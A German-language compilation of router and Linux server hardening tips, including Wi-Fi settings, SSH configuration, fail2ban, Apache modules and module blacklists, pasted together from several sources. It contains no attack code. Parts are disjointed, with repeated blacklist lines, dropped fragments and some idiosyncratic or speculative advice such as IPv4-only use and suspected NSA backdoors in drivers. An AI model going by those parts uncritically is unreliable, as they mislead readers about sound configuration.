Internetgeschwindigkeit erhöhen, eine bessere Verbindung herstellen und mehr Geräte anschließen. Viele Router verwenden automatisch den neuesten Wi-Fi-Standard. Wenn Ihr Router jedoch ermöglicht, den Wi-Fi-Standard zu ändern, finden Sie diese Option in der Regel im Abschnitt "Drahtlos" der Router-Einstellungen. Bei einigen Routern wird Wi-Fi 6 als "802.11ax" bezeichnet. Wenn Ihr Router Wi-Fi 6 nicht unterstützt, aktivieren Sie den neuesten verfügbaren Standard. Wi-Fi 5 kann als "802.11ac" und Wi-Fi 4 als "802.11n" aufgeführt sein. WPS deaktivieren Wi-Fi Protected Setup (WPS) ist ein Netzwerksicherheitsstandard, der bei vielen Routern standardmäßig aktiviert ist, aber erhebliche Sicherheitslücken aufweist. Sie können überprüfen, ob Ihr Router WPS unterstützt, indem Sie nach einem physischen WPS-Knopf am Router suchen, die offizielle Dokumentation lesen oder nach "[Routername] wps" suchen. Die Option zum Deaktivieren von WPS befindet sich in der Regel unter "Erweitert", "Erweiterte Einstellungen", "Schnittstelleneinstellungen", "Netzwerkcenter", "Drahtlos" oder "Drahtloseinstellungen" in den Einstellungen Ihres Routers. Fernverwaltung deaktivieren Fernverwaltung, Fernzugriff oder Fernverwaltung ist eine Funktion, die es Personen außerhalb Ihres lokalen Netzwerks ermöglicht, sich bei Ihrem Router anzumelden. Die meisten Router haben diese Funktion standardmäßig deaktiviert, aber Sie sollten immer die Einstellungen Ihres Routers überprüfen und sicherstellen, dass die Fernverwaltung deaktiviert ist. Die Option zum Überprüfen und Deaktivieren der Fernverwaltung befindet sich in der Regel im Abschnitt "Erweiterte Einstellungen", "Zugriffsverwaltung", "Verwaltung", "Fernzugriff", "Fernverwaltung" oder "Webdienstverwaltung" in den Einstellungen Ihres Routers. HTTPS-Authentifizierung aktivieren Viele Router stellen die Verbindung zu ihren Einstellungen über das standardmäßige Hypertext Transfer Protocol (HTTP) her. Sie können diese Verbindung sicherer machen, indem Sie sie auf Hypertext Transfer Protocol Secure (HTTPS) umstellen. Die Option zum Überprüfen und Aktivieren von HTTPS befindet sich in der Regel im Abschnitt "Verwaltung", "Systemsteuerung", "Netzwerk", "Sicherheit" oder "System" der Router-Einstellungen. 11. Aktivieren Sie die Firewall Ihres Routers. Die Firewall Ihres Routers schützt Ihr Heimnetzwerk, indem sie die meisten Verbindungen aus dem Internet blockiert. Bei den meisten Routern ist die Firewall bereits aktiviert, aber es ist ratsam, die Einstellungen Ihres Routers zu überprüfen und sicherzustellen, dass die Firewall aktiviert ist. Die Option zum Überprüfen und Aktivieren der Firewall Ihres Routers finden Sie in der Regel unter "Erweiterte Einstellungen", "Inhaltsfilterung", "Firewall" oder "Sicherheit" in den Einstellungen Ihres Routers. Nachdem Sie die Firewall aktiviert haben, überprüfen Sie, ob Sie damit anonyme Internetanfragen und Port 113 filtern oder blockieren können. Wenn dies möglich ist, filtern oder blockieren Sie diesen Datenverkehr, um einige der potenziellen Wege zu schließen, die Eindringlinge nutzen könnten, um Ihren Router anzugreifen. Einrichtung eines Gast-Wi-Fi-Netzwerks Wenn Sie ein Gast-Wi-Fi-Netzwerk einrichten, können sich Besucher mit Ihrem Wi-Fi-Netzwerk verbinden, ohne Zugriff auf die Dateien und Computer in Ihrem Heimnetzwerk zu erhalten. Die Option zum Einrichten eines Wi-Fi-Gastnetzwerks finden Sie in der Regel in den Einstellungen Ihres Routers unter "Erweitert", "Gastzugang", "Gastnetzwerk", "Einstellungen" oder "Wi-Fi-Verbindung". Halten Sie die Firmware ihres Routers auf dem neuesten Stand Die neueste Firmware auf Ihrem Router ist wichtig, um sich vor den neuesten Sicherheitsbedrohungen zu schützen, und kann auch die Leistung Ihres Routers verbessern. Einige Router benachrichtigen Sie, wenn eine neue Firmware verfügbar ist, sobald Sie sich bei den Einstellungen Ihres Routers anmelden. Wenn Ihr Router Sie nicht automatisch benachrichtigt, finden Sie die Option zum Überprüfen und Aktualisieren der Router-Firmware in der Regel unter "Verwaltung", "Erweitert", "Firmware-Update" oder "Router-Update" in den Einstellungen Ihres Routers. Einige Router bieten auch automatische Firmware-Updates an. Dies kann eine echte Möglichkeit sein, um über Firmware-Updates auf dem Laufenden zu bleiben. Bevor Sie jedoch automatische Firmware-Updates aktivieren, sollten Sie sich genau darüber informieren, wie diese auf Ihrem Router durchgeführt werden, um sicherzustellen, dass die Updates Ihre Verbindung nicht beeinträchtigen. Einrichtung eines VPN auf Ihrem Router in Betracht ziehen Wenn Sie bereits ein virtuelles privates Netzwerk (VPN) verwenden, können Sie es auf Ihrem Router einrichten, um Ihr gesamtes Heimnetzwerk und alle Geräte, die daran angeschlossen sind, zu schützen. Auf diese Weise können Sie nicht nur die Verschlüsselung des VPN-Verkehrs auf Geräte ausweiten, für die es keine VPN-Anwendungen gibt (z. B. Videospielkonsolen), sondern auch mehrere Geräte über eine einzige VPN-Verbindung betreiben (was nützlich sein kann, wenn Ihr VPN-Anbieter die Anzahl der Verbindungen begrenzt). Die Option zur Installation eines VPN finden Sie in der Regel in den Einstellungen Ihres Routers unter "Erweitert", "VPN", "VPN-Client" oder "VPN-Server". Unsere empfohlenen VPN-Anbieter finden Sie hier. 15) Installation einer angepassten Router-Firmware in Betracht ziehen Die meisten Router-Firmware-Programme sind Closed-Source-Programme, d.h. es gibt keinen öffentlich zugänglichen Quellcode, der überprüft werden kann, und die Funktionen werden vom Anbieter der Firmware festgelegt. Wenn Sie mehr Einblick in den Quellcode Ihres Routers haben und die Funktionen anpassen möchten, sollten Sie die Installation einer benutzerdefinierten Router-Firmware in Erwägung ziehen. Zwei der beliebtesten Open-Source-Lösungen für angepasste Router-Firmware sind OpenWrt und PfSense. OpenWrt bietet mehr als 3.000 Pakete, die installiert werden können, um Ihrem Router zusätzliche Funktionen hinzuzufügen. Mit diesen Paketen können Sie Werbung auf Routerebene blockieren (was bedeutet, dass sie auf allen Geräten blockiert wird), Download- und Bandbreitenbeschränkungen festlegen, Ihren Router zu einem zentralen Knotenpunkt für die Heimautomatisierung machen und vieles mehr. PfSense verfügt über mehr als 60 Pakete, die installiert werden können, um die Funktionalität des Routers zu erweitern. Ferner bietet PfSense integrierte Backup-Konfigurationen (mit denen Sie Ihre Router-Einstellungen einfach sichern können), spezifisches Traffic-Routing (mit dem Sie festlegen können, wie die einzelnen Geräte ihren Datenverkehr leiten sollen, z.B. können Sie festlegen, dass einige Geräte ihren Datenverkehr über Ihr VPN leiten und andere Geräte Ihr VPN nicht verwenden), einfache Konfigurationen von Firewall-Regeln und vieles mehr. Einige Router sind nicht mit benutzerdefinierter Firmware kompatibel, daher müssen Sie prüfen, ob Sie OpenWrt oder PfSense auf Ihrem Router installieren können. Sie können in der offiziellen Dokumentation Ihres Routers nachsehen oder nach "[Routername] openwrt" oder "[Routername] pfsense" suchen, um herauszufinden, ob Ihr Router benutzerdefinierte Firmware unterstützt. Wenn Ihr Router benutzerdefinierte Firmware unterstützt, suchen Sie in den Suchergebnissen nach Installationsanweisungen und folgen Sie diesen, um OpenWrt oder PfSense auf Ihrem Router zu installieren. Schränken Sie die physische Sichtbarkeit Ihres Routers ein. Ihr Router enthält viele physikalische Informationen, die von Angreifern ausgenutzt werden könnten. Zum Beispiel könnte die Form oder der Text auf Ihrem Router die Marke und Modellnummer verraten. Sie sollten daher Maßnahmen ergreifen, um die Sichtbarkeit Ihres Routers zu verbergen. Im Idealfall sollte er an einem vollkommen unzugänglichen Ort aufgestellt werden, z. B. in einem Schrank oder in einem separaten Raum. Zumindest sollte er in einem Bereich stehen, der nicht durch Fenster eingesehen werden kann. Helfen Sie anderen, ihren Router sicherer und schneller zu machen Wenn Sie diese Tipps befolgen, können Sie schneller und sicherer im Internet surfen. Geben Sie diese Tipps auch an Freunde, Verwandte und andere Personen weiter, die ihre Router-Einstellungen aktualisieren müssen. Quelle: Make These Changes To Your Router to Patch Security Holes and Increase Internet Speed, https://reclaimthenet.org/make-these-changes-to-your-router-to-patch-security-holes-and-increase-internet-speed https://uncutnews.ch/nehmen-sie-diese-aenderungen-an-ihrem-router-vor-um-sicherheitsluecken-zu-schliessen-und-die-internetgeschwindigkeit-zu-erhoehen/ Lesermeinung Gooken Unter vielem anderen hier zusätzlich zu beachten: Welche Server sind mit dem Router verbunden? Dritte? Gastserver? Gäste? Sperrung/Austragung/Deaktivierung Ist der Adressraum IPv6 zugelassen (statische Adressen)? Wir emfehlen nur IPv4. Neben UPnP: Mediaserver, NAS-Server, ...: aktiveren oder deaktivieren. FTP-/FTPs-Zugang? Ist eine WPA3-Verschlüsselung möglich? Aktivierte Router-Firewall (Verhinderung der Nutzung verbundener Geräte als Server, geräteweise Einstellung)? Individuelle Benutzereinstellungen? Automatische Updates für den Router: aktivieren/deaktiveren Automatische Verbindungsaufnahme zum ISP (Internet Service Provider, Internet-Zugang-Anbieter)? deaktivieren Wartung/Reparatur des Routers durch Dritte? deaktivieren ... (!) Gehen Sie sorgsam alle möglichen Router-Einstellungen durch und halten Sie eventuell Rücksprache mit ihrem ISP! Sicherheitsupdates: Kritische Root-Lücken in SD-WAN-Routern von Cisco, CHIP, 30.01.2021 Admins von Cisco-Hard- und -Software sollten die aktuellen Sicherheitspatches installieren. Ansonsten könnten Angreifer Netzwerke attackieren und in einigen Fallen Schadcode ausführen und so die komplette Kontrolle übernehmen. https://www.trojaner-info.de/business-security/aktuell/sicherheitsupdates-kritische-root-luecken-in-sd-wan-routern-von-cisco.html Ggfls. Deinstallieren / evtl. deinstall ( rpm -e packagename or rpm -e --nodeps packagename ) ConsoleKit (el6, außer /usr/libexec/ck*session-info* ), rpcbind (el6, mdv2010.2), sudo (el6, mdv2010.2), acpid (hald (pclos) führt bereits Rootprozess acpid aus), portmap (el6, mdv2010.2), dayplanner, lxde (mdv2010, Auslösung eines andauernd um in den Root-Modus gehen wollenden Prozesses von lxpanel), mmc-agent (mdv2010.2), tracker (mdv2010), codeina (mdv2010), xguest (mdv2010), wu-ftpd (mdv2010), anonftp (mdv), mdkonline (mdv2010), f-spot (does not work on the base of updated mono (rosa2014.1), funguloids (mdv2010.2), banshee (rosa,mdv) and amarok (rosa,mdv): unavailable for el6, both ones do not work, abrt (el6), qmmp (el6, mdv) does not work, generell alle Programme bzw. Prozesse, die nicht richtig laufen oder unaufgefordert in den Root-Modus wechseln wollen. Dies sind zum Glück aber nur einige wenige; alle möglichen Terminals und Konsolen auß den bzw. der favorisierten. Nur Root-Prozesse stellen bald theoretisch noch eine ernstzunehmende Gefahr dar! Die Anzahl nicht vom Kernel über kthreadd aktivierter, laufender Root-Prozesse sollten sich in argen Grenzen halten, benötigte Root-Prozesse lauten lediglich: init X # xhost-Zugriffsschutz oder im Benutzermodus / Usermode nach https://wiki.gentoo.org/wiki/Non_root_Xorgund, X mit Option "--nolisten tcp" (voreingestellt oder in /etc/X11/xorg.conf unter ServerLayout; Abfrage über Tastendruck ESC+CTRL und Maus ü,ber Prozess X); kdm: /usr/share/config/kdm/kdmrc ... AllowNullPasswd=false AllowRootLogin=false AllowShutdown=None AutoReLogin=false ... ServerArgsLocal=-deferglyphs 16 -nolisten tcp ... hald # macht acpid überflüssig console-kit-daemon # nur fü Login erforderlich, timeout möglich wpa-supplicant # Teil des NetworkManagers psad # oder iptables: psd, Port-Scan-Detektor; starte nur mit sichernden Optionen wie --no-rdns, --no-whois und --no-snort-sids udevd # Geräte und Schnittstellen, Option -d (voreingestellt) kdm syslogd klogd gpm cupsd dhclient # oder dhcpd etc. pam_timestamp_c master spamd # probiere alternativ z.B. den stets im Benutzermodus laufenden bogofilter Verwende nur net_applet aus NetworkManager und nicht nm-applet. Ersetze im möglicherweise fehlerhaften Skript /etc/init.d/NetworkManager innerhalb der Funktion start() alles außer letzte Zeile mit dem Aufruf "/usr/bin/NetworkManager --login-level=INFO". Kommerzielle Module: Linux and the NSA tgruene, 16.10.2013 Bei dem letzten Newslink über Oracles Versuch, dem DOD den Vorteil kommerzieller Software zu erkläeren, kam mir der Gedanke, dass auf einem.typischen Linuxrechner eine ganze Reihe Module laufen, fuer die kein Quellcode zur Verfuegung steht (die dafür von US-amerikanischen Firmen zur Verfügung gestellt werden und somit vermutlich auch gesetzestreue (aka NSA-freundliche) Hintertüren enthalten), seien es Nvidia/ATI-Treiber, Virtualbox oder unter Debian vermutlich fast der gesamte Inhalt von firmware-linux-nonfree. Mich interessiert, wie gut der Kernel und die Module voneinander abgeschottet sind - wie leicht ist es, solch einem Modul z.B. einen Keylogger einzubauen, der meine Passwörter beim Tippen abfängt und übers Internet irgendwohin schickt? Dass die NSA meine Emails liest, ist unverschämt, stört mich aber an sich nicht weiter, sonst würde ich ja keine Emails an Leute schreiben, deren Schlüssel ich nicht kenne, doch meinen GPG-Schlüssel und die Passwörter abzuhören - dagegen habe ich ganz ordentlich etwas. Terminal -> lsmod /etc/modprobe.d/blacklist* blacklist mei blacklist it87 # Mainboard ASUS ITX-220 blacklist i2c_dev # ITX-220 blacklist coretemp # ITX-220 blacklist snd-usb-audio blacklist snd_pcm_oss blacklist snd_mixer_oss blacklist snd_seq_oss blacklist pata_acpi blacklist rivatv blacklist i82875p_edac # do not use "Boot Protocol" drivers, we prefer usbhid # and they cause problems when loaded together with usbhid (#37726, #40861) blacklist usbkbd blacklist usbmouse # disable PC speaker by default # pcspkr is the standard driver, while snd-pcsp is the ALSA driver blacklist pcspkr blacklist snd-pcsp blacklist pcspkr blacklist snd-pcsp blacklist vhost blacklist vhost_net blacklist tpm_infineon blacklist tmp_tis blacklist tmp_tis_core blacklist i82875p_edac blacklist pcspkr blacklist snd-pcsp blacklist rivatv blacklist i82875p_edac blacklist pcspkr blacklist it87 blacklist i2c_dev blacklist coretemp blacklist vhost_net blacklist tpm_infineon blacklist tmp_tis blacklist tmp_tis_core blacklist i82875p_edac blacklist pcspkr blacklist snd-pcsp blacklist rivatv blacklist i82875p_edac blacklist pcspkr # watchdog drivers blacklist i8xx_tco # framebuffer drivers blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist i810fb blacklist cirrusfb blacklist intelfb blacklist kyrofb blacklist i2c-matroxfb blacklist hgafb blacklist nvidiafb blacklist rivafb blacklist savagefb blacklist sstfb blacklist neofb blacklist tridentfb blacklist tdfxfb blacklist virgefb blacklist vga16fb blacklist matroxfb_base # ISDN - see bugs 154799, 159068 blacklist hisax blacklist hisax_fcpcipnp Partitions-Check bei jedem System-Start (System-Boot) Die Erkläuterung erfolgt eigentlich weiter unten und wurde an diese Stelle vorgezogen. Unter den Annahme, dass die Partitionen bereits mit LUKS/dm-crypt verschlüsselt worden sind (wie das geht, beschreiben wir noch), empfiehlt sich aufgrund der bevorstehenden Menge an Updates (mit rpm-Paketen) der i.a. nur wenige Sekunden dauernde Check jeder nicht internen Partition vorsichtshalber bei jedem Systemstart. Das gilt auch für noch unverschlüsselte Partitionen. Das Dateisystem der Partitionen sei z.B. ext4.
bzw.
und
für die maximale Anzahl der Systemneustarts (im auch fehlerfreien Fall), hier der (von uns empfohlenen) Zahl eins bis zum nächsten automatisch erfolgenden (ausführlichen) Dateisystemcheck der Root-, Home- und unverschlüsselten Bootpartition usw mit e2fsck bzw. reiserfsck (wenn auch nicht die internen Kernel-Partitionen shm, tmp und proc).. Anstelle der Containerdatei "/dev/mapper/cryptedhomepartiton" kann hier natürlich auch jede nicht verschlüsselte ext- uind reiserfs-Partition durch die zugehörige Gerätedatei wie bspws. /dev/sda1 angegeben werden. In der Geräte-Konfigurationsdatei /etc/fstab aktiviere man am Ende jeder Zeile für eine Partition noch "prioritätisch" ihren Check durch Angabe einer Zahl hinter der Zahl 0 für den deaktivierten Dump (Speicherauszug im Fehlerfall): "0 1" für die Root-Partition, "0 1" oder "0 2" für die Home-Partition usw.. Den Inhalt unserer fstab geben wir weiter unten noch einmal in aller Ausführlichkeit an. Apache-Webserver absichern in httpd.conf (analog: LAN/Samba samba und samba4 mit samba.conf, Datenbankserver/MySQL mit my.cnf und mysld.conf und weitere Server, Druckerserver (CUPS) siehe am Ende der Webseite ) Jetzt kommt der Webserver an die Reihe, fast immer ist ein Apache httpd 1.3 oder 2.0 installiert. Dessen Grundfunktionen werden durch etliche ladbare Module ergänzt. Welche Module aktuell benutzt werden, steht bei Version 1.3 in der Datei /etc/apache/httpd.conf (bei CentOS 6 und CentOS 7: /etc/httpd/httpd.conf), etwa LoadModule autoindex_module /usr/lib/apache/1.3/mod_autoindex.so LoadModule dir_module /usr/lib/apache/1.3/mod_dir.so LoadModule cgi_module /usr/lib/apache/1.3/mod_cgi.so LoadModule userdir_module /usr/lib/apache/1.3/mod_userdir.so LoadModule proxy_module /usr/lib/apache/1.3/libproxy.so Überflüssige Module kommentieren Sie hier # plus Leerzeichen am Zeilenanfang aus. Das hat neben dem Sicherheitsaspekt noch den netten Zusatzeffekt, dass der Apache mit weniger Modulen schneller arbeitet und weniger Speicher benötigt. Nur Module, die tatsächlich benötigt werden, sollten geladen werden. Welche das sind, hängt von den Aufgaben Ihres Servers ab. Auf einem StandardWebserver sind fast immer überflüssig: * lib_status (liefert eine serverinterne Statusanzeige) * libproxy (damit dient der Webserver als Zwischenspeicher für Zugriffe auf weitere Server - ein enormes Sicherheitsrisiko!) * mod_cgi (dient zum Ausführen sogenannter cgi-scripte, die heute kaum noch verwendet werden, ebenfalls ein Sicherheitsrisiko) * mod_userdir (generiert für jeden auf dem System vorhandenen Benutzer ein eigenes Webserver-Verzeichnis) Ein Apache 2.0 verwendet in Debian die Datei /etc/apache2/apache2.conf zur Konfiguration. Dort wiederum werden standardmäßig alle Module geladen, für die im Verzeichnis /etc/apache2/mods-enabled/ ein symbolischer Link vorhanden ist. Zum Ausschalten eines Moduls müssen Sie deshalb diesen Link löschen. Nach dem Ändern der Config-Dateien zeigt ein apache -t ob die Konfigurations-Syntax noch in Ordnung ist. Ein /etc/init.d/apache restart oder /etc/init.d/apache2 restart # C6 (el6): sh /etc/init.d/httpd restart startet dann den Server neu, damit die Änderungen auch wirksam werden. Unter Suse ist es ein wenig anders. Dort werden die Apache-Module in der Datei /etc/sysconfig/apache2 geladen. Suchen Sie in der Datei nach der Zeile APACHE_MODULES und löschen Sie daraus die nicht gewünschten Einträge. Danach müssen Sie SuSEconfig von der Shell aus aufrufen. Anschließend starten Sie mit rcapache2 restart den Webserver neu. Genaue Infos zur Aufgabe jedes Moduls gibt es auf den Apache-Webseiten unter http://httpd.apache.org/docs/1.3/mod/index-bytype.html und http://httpd.apache.org/docs/2.0/mod/ Ähnliche Beiträge Apache: Unerwünschte Referer stoppen, https://www.strassenprogrammierer.de/apache-unerwuenschte-referer-stoppen_tipp_441.html Quelle: https://www.strassenprogrammierer.de/webserver-absichern-hacker_tipp_479.html Sicherer Apache/PHP/Nginx server Editiere httpd.conf (CentOS: /etc/httpd/conf/httpd.conf) und füge hinzu: ServerTokens Prod ServerSignature Off TraceEnable Off Options all -Indexes Header always unset X-Powered-By Starte httpd/apache2 server neu. mod_security muss erm&oumL;glicht sein für RHEL/CentOS-Server. Editiere noch php.ini https://www.cyberciti.biz/tips/linux-security.html Debian 7.0: Webserver absichern, https://debianforum.de/forum/viewtopic.php?f=37&p=914095 Hackversuche gegen die Secure Shell unterbinden Um zu verhindern, dass durch einen Hackversuch hunderte sshd-Tasks gleichzeitig gestartet werden, fügen Sie die Zeile MaxStartups 3:30:10 in das Configfile /etc/ssh/sshd_config ein. Diese Beschränkung ist effektiv, aber kompliziert: Die Werte im Beispiel bedeuten, dass 2 (= 1. Wert minus 1) unauthenticated (also im Login-Stadium befindliche) sshd-Verbindungen immer erlaubt sind. Ab der 3. Verbindung (= 1. Wert) wird mit einer Wahrscheinlichkeit von 30% (2. Wert) die Verbindung abgelehnt. Die Wahrscheinlichkeit, dass eine Verbindung beendet wird, steigt linear an, bis bei 10 offenen Verbindungen (3. Wert) jeder weitere Verbindungsversuch zu 100% abgelehnt wird. Achtung: Bereits eingeloggte Nutzer zählen nicht zu diesen Werten! Die Beispielwerte sollten für jeden kleineren bis mittleren Server ausreichend sein. Haben Sie viele SSH-Nutzer, können höhere Werte angebracht sein, zum Beispiel: MaxStartups 10:30:50 6 Quelle: https://www.strassenprogrammierer.de/sicherheit-ssh-hacker_tipp_480.html Zugang für root bei SSH verbieten Wenn wir im vorherigen Schritt alles richtig gemacht haben - und nur dann - gehen wir jetzt daran, den Zugang für root über SSH zu verbieten. Zur Sicherheit behalten wir die eine Session offen und testen das Ganze mit einer neuen Session. Erst wenn das funktioniert hat, können wir die erste Session wieder schliessen. Wir ändern die Konfiguration von SSH mit: nano /etc/ssh/sshd_config Im Editor suchen wir die Zeile PermitRootLogin yes und ändern sie auf PermitRootLogin no Und um das Ganze noch mehr zu vernageln fügen wir noch ein paar Zeilen hinzu: # Nur noch den user admin zulassen. AllowUsers admin # root oder benutzer in der Gruppe root generell sperren DenyUsers root DenyGroups root Das Ganze können wir am Anfang der Datei einfügen. Sollen sich später noch andere Benutzer per SSH anmelden dürfen, kann man den Eintrag AllowUser erweitern. Neue Benutzer werden mit Leerzeichen getrennt hinzugefügt. z.B.: AllowUsers admin benutzer1 benutzer2 benutzer3 Wichtig: Auf keinen Fall nach den Benutzernamen ein Komma einfügen. Aussperrgefahr! Mit STRG-O und STRG-X speichern wir und beenden den Editor. Jetzt fehlt noch: service ssh restart Debian: /etc/init.d/ssh reload CentOS: sh /etc/init.d/sshd restart Wir öffnen zur Kontrolle eine neue Sitzung (Session) und versuchen uns mit root anzumelden. Mit korrektem Kennwort sollten wir die Meldung bekommen: Access denied Quelle: https://www.rechenkraft.net/wiki/Root_Server_absichern_(Ubuntu_14.04) https://linux-scout.de/sicherheit/debian-server-absichern-so-machen-sie-es-richtig/ Absichern eines Linux-Servers Aus Qloc Wiki Hier finden Sie wichtige Grundlagen zur Absicherung eines Debian/Ubuntu Systems. Außer den hier aufgelisteten Tipps gibt es eine Reihe von weiteren Sicherheitsmaßnahmen, die Angriffe erschweren. Generell gilt für alle öffentlich erreichbare Systeme, dass nur notwendige Dienste von außen erreichbar sein sollten. Dienste wie z.B. Webserver oder MySQL Server sollten bei Nichtverwendung entweder mit Hilfe von IPTables Regeln nicht erreichbar oder ganz deaktiviert werden. Inhaltsverzeichnis 1 Sichere Kennwörter verwenden 2 SSH Port ändern 3 Einrichten von SSH-Schlüsseln 4 Nur die benötigten Ports offen lassen 5 Brute Force Attacken verhindern 6 Sicherheitsupdates installieren Sichere Kennwörter verwenden Ändern Sie regelmäßig Ihre Kennwörter (auf unserem System nicht erforderlich!) und beachten Sie folgende Punkte: Kleinbuchstaben (a-z) Großbuchstaben (A-Z) Ziffern (0-9) mindestens 12 Zeichen lang keine Wörter enthalten dasselbe Passwort nicht für mehrere Dienste nutzen Passwörter nicht an Dritte weitergeben SSH Port ändern Eine Großzahl an Loginattacken auf SSH erfolgt auf den Standardport 22. Eine einfache und effektive Methode ist es, den SSH Port zu ändern. Öffnen Sie dazu die SSH Konfiguration mit einem beliebigen Editor: nano /etc/ssh/sshd_config Ändern Sie den SSH Port von Port 22 auf einen Port, der nicht nicht durch einen anderen Dienst belegt wird. Port 22 #z.B. Port 8335 Mit dem folgenden Befehl erhalten Sie eine Liste mit allen momentan verwendeten Ports und ausgeführten Diensten: more /etc/services Starten Sie den SSH Dienst nach dem Ändern des Ports mit dem folgenden Befehl neu: /etc/init.d/ssh restart bzw. (CentOS (el6) und andere ): sh /etc/init.d/ssh restart oder service ssh restart Einrichten von SSH-Schlüsseln Um die Verbindung via SSH noch sicherer zu gestalten, kann man die sogenannten SSH-Schlüssel verwenden. Damit eine Verbindung aufgebaut werden kann müssen der vom Benutzer bereitgestellte Schlüssel bei der Verbindung und der auf dem Server liegende Schlüssel als Schlüsselpaar zusammengehören. Melden Sie sich zunächst mit dem zu sichernden Benutzer auf Ihrem Linux Server an. Laden Sie sich das Programm PuTTYgen herunter. Klicken Sie auf Generate um ein SSH-Schlüsselpaar zu erstellen, hierfür sind die Standardeinstellungen genügend. Zum Generieren bewegen Sie Ihre Maus über das freie Feld. Nach erfolgreichem Generieren des SSH-Schlüsselpaares speichern Sie den Privatekey auf Ihrem Rechner ab und verwahren Sie diesen sicher, da Sie sich nur mit diesem auf Ihren Server aufschalten können. Optional ... können Sie einen Kommentar hinzufügen ... können Sie ein Passwort hinzufügen (empfohlen) Anschließend verbinden Sie sich mit Ihrem Linux Server und betreten das Home-Verzeichnis des jeweiligen Benutzers cd /home/>user< oder cd /root (nur root-Benutzer) Legen Sie nun das Verzeichnis .ssh an und erstellen in diesem eine Datei mit dem Namen authorized_keys mkdir .ssh && nano .ssh/authorized_keys Kopieren Sie nun den Publickey aus PuTTYgen in Ihre Zwischenablage und fügen diesen in die Datei ein. Mit STRG + O und STRG + X können Sie die Datei speichern und schließen. Nun müssen noch die Dateiberechtigungen angepasst werden. chown -R >user>:>gruppe> .ssh chmod 700 .ssh chmod 600 .ssh/authorized_keys In der Datei /etc/ssh/sshd_config sollten wichtige Einstellungen vorgenommen werden. .... PasswordAuthentication [no/yes] # Authentifizierung mit einem Passwort PermitRootLogin [no/yes/without-password] # Authentifizierung mit dem root-Benutzer ... PasswordAuthentication: no: Die Authentifizierung mit einem Passwort ist für alle Benutzer untersagt yes: Die Authentifizierung mit einem Passwort ist für alle Benutzer erlaubt PermitRootLogin : no: Die Authentifizierung mit dem root-Benutzer nicht erlaubt yes: Die Authentifizierung mit dem root-Benutzer ist mit einem Passwort und einem Key erlaubt without-password: Die Authentifizierung mit dem root-Benutzer ist nur mit einem SSH-Key erlaubt (empfohlen) Abschließend starten Sie den ssh-Dienst neu service ssh restart Sie haben nun erfolgreich SSH-Keys auf Ihrem Server eingerichtet. Damit Sie sich nun mit Ihrem Server verbinden können, müssen Sie den Privatekey in PuTTY einbinden. Hierzu wählen Sie ihre Verbindung und klicken auf Connection > SSH > Auth. Unter Private key file for authentification geben Sie den Dateipfad an. Wechseln Sie zurück auf den Menüpunkt Session und speichern Sie Ihre Verbindung. Brute Force Attacken verhindern Mit dem Paket fail2ban können Sie Ihren Server vor sogenannten Bruteforce Attacken schützen. Dabei wird die IP Adresse des Angreifers für eine festgelegte Zeit gesperrt. Mit den folgenden Befehlen installieren und konfigurieren Sie fail2ban: [...] Öffnen Sie die Konfiguration von fail2ban mit einem beliebigen Editor nano /etc/fail2ban/jail.conf Setzen Sie lokale IP Adresse Ihres Servers, die Zeit wie lange eine IP geblockt werden soll und die Anzahl der Versuche, nach denen geblockt werden soll: ignoreip = 127.0.0.1 bantime = 3600 maxretry = 3 Definieren Sie nun die erforderlichen Parameter um den SSH Dienst zu überwachen: enabled = true port = ssh filter = sshd logpath = /var/log/auth.log maxretry = 4 Hinweis: Sollten Sie den SSH Port geändert haben, ändern Sie bitte die folgende Zeile: port = <SSH Port> (z.B. 8335) Starten Sie zum Abschluss den Dienst fail2ban neu: CentOS (el6) u.a.: sh /etc/init.d/fail2ban restart bzw. /etc/init.d/fail2ban restart bzw. service fail2ban restart https://wiki.qloc.de/index.php/Absichern_eines_Linux_Servers Berücksichige ggfls. zugehörige Module und Sicherheit erhöhende Server-Erweiterungen. Bereits an dieser Stelle sei natürlich noch auf die Server-Konfigurationsdateien verwiesen, mit denen sich i.a. viele weitere Sicherheits-Einstellungen (wie Zugriff, ACL-Zugriffsrechte, zu öffende Server-Ports (nun auf Client-Seite), Protokollierung und Bandbreite) vornehmen lassen. Außerdem kann der Server nach seiner Konfiguration zur Erhöhung der Sicherheit in einem niedrigeren Runlevel (z.B. Runlevel 3) als üblicherweise Runlevel 5 und 6 gestartet werden und laufen: Kommando "init 3", mgetty bzw. mingetty: Terminal-Umschaltung ( ALT + CTRL + F1 bis F7), Konfigurationsdatei (falls dort möglich), systemd (sysctl) oder chkconfig (zum Setzen seines Starts in einem bestimmten Runlevel während des System-Boots). - Apache: mod_evasive gegen DDoS, mod_cband als Traffic-Cop - Fail2Ban für die https-vHosts bzw. die htaccess Authentifizierung - 24/7 Monitoring mit SMS Alerting über ein SMS Gateway via monit - Verschlüsselte Backups in 2 verschiedenen Rechenzentren - SFTP heisst das Stichwort. Die Datentransfers laufen verschlüsselt über den sshd ab. FTP ist kein verschlüsselter Dienst ist. Man kann also den kompletten Datenverkehrt (austausch von Passwörtern, die verschickten Daten) mitlesen. Also ist es nicht unbedingt das sicherste System. Das ist ähnlich wie mit POP3 oder IMAP. Jedoch kann man das Ganze sicherer machen, indem man einen FTP-Server aufsetzt, der mit SSL-Verschlüsselung arbeitet. Eben so geht das auch mit POP3 und auch IMAP. Sobald du mit SSL-Verschlüsselung arbeitest, kann niemand den Austausch von Daten mitlesen. Und zu guter letzt, kommt es natürlich auf die Konfiguration des FTP-Server an. Hier sollte man auf jeden Fall anonyme Accounts verbieten und den FTP-Server in einer CHROOT Umgebung laufen lassen. Dann hält man sich schon mal einen großen Teil des Ärgers vom Hals. Ich hatte mir damals gedacht, dass man damit 2 Fliegen mit einer Klappe schlägt: Den sshd braucht man eh, also kann man die Dateitransfers auch darüber abwickeln und spart sich damit einen Angriffsvektor (ftpd). Gleichzeitig ist alles so toll verschlüsselt . Normalerweise ist das Verbinden mit einem FTP-Server mit SSL nicht schwieriger als mit einem ohne. Man wählt beim Client einfach aus, dass man sich mit SSL-Unterstützung verbinden will, und verbindet sich. Dann läuft alles so weiter, wie wenn man sich mit einem FTP-Server ohne SSL verbindet. Man wird höchstens noch mal gefragt, ob man das Zertifikat akzeptiert. Über Port 22 läuft der SSH-Server. Auch hier gibt es die Möglichkeit Daten hochzuladen. Wobei hier der User der sich einloggt auf das System mehr zugreifen kann. Ausser man chrootet den Account. Chrooten geht ja erst mit einem OpenSSH ab 4.9 oder so. Auf jeden Fall zu neu für eine Standard Debian Installation bzw. die regulären Paketquellen. Lösen lässt sich das mit MySecureShell - Index, 